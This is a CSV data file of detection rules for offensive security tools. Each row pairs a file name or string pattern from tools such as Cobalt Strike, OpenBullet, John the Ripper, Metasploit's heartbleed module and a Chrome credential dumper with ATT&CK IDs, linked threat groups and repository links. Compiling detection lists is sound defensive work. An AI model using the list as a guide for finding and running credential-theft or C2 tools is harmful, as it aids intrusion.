"*openbsd_softraid2john.py*",".{0,1000}openbsd_softraid2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53942"
"*OpenBullet.csproj*",".{0,1000}OpenBullet\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53943"
"*OpenBullet.exe*",".{0,1000}OpenBullet\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53944"
"*OpenBullet.pdb*",".{0,1000}OpenBullet\.pdb.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53945"
"*OpenBullet.sln*",".{0,1000}OpenBullet\.sln.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53946"
"*OpenBullet.zip*",".{0,1000}OpenBullet\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53947"
"*openbullet/openbullet*",".{0,1000}openbullet\/openbullet.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53948"
"*OpenBullet2.Console.zip*",".{0,1000}OpenBullet2\.Console\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53949"
"*OpenBullet2.Native.exe*",".{0,1000}OpenBullet2\.Native\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53950"
"*OpenBullet2.Native.zip*",".{0,1000}OpenBullet2\.Native\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53951"
"*OpenBullet2.zip*",".{0,1000}OpenBullet2\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53952"
"*openbullet2:latest*",".{0,1000}openbullet2\:latest.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53953"
"*OpenBullet2-master*",".{0,1000}OpenBullet2\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53954"
"*OpenBulletApp.cs*",".{0,1000}OpenBulletApp\.cs.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53955"
"*OpenBulletCLI.csproj*",".{0,1000}OpenBulletCLI\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53956"
"*OpenBulletCLI.exe*",".{0,1000}OpenBulletCLI\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53957"
"*openbullet-master*",".{0,1000}openbullet\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53958"
"*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53959"
"*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53960"
"*openChromeDumpsHTML.exe*",".{0,1000}openChromeDumpsHTML\.exe.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53961"
"*opencubicles/h8mail*",".{0,1000}opencubicles\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","53962"
"*OPENCYBER-FR/RustHound*",".{0,1000}OPENCYBER\-FR\/RustHound.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","53963"
"*openGoldenTicketDialog*",".{0,1000}openGoldenTicketDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53964"
"*Opening PSEXEC shell at *",".{0,1000}Opening\sPSEXEC\sshell\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","53965"
"*openKeystrokeBrowser*",".{0,1000}openKeystrokeBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53966"
"*openPayloadGenerator*",".{0,1000}openPayloadGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53967"
"*openPayloadGeneratorDialog*",".{0,1000}openPayloadGeneratorDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53968"
"*openPayloadHelper*",".{0,1000}openPayloadHelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53969"
"*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53970"
"*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53971"
"*openSpearPhishDialog*",".{0,1000}openSpearPhishDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53972"
"*openssl_heartbleed.rb*",".{0,1000}openssl_heartbleed\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53973"
"*openssl2john.py*",".{0,1000}openssl2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53974"
"*OpenVAS*",".{0,1000}OpenVAS.{0,1000}","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://www.openvas.org/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53975"
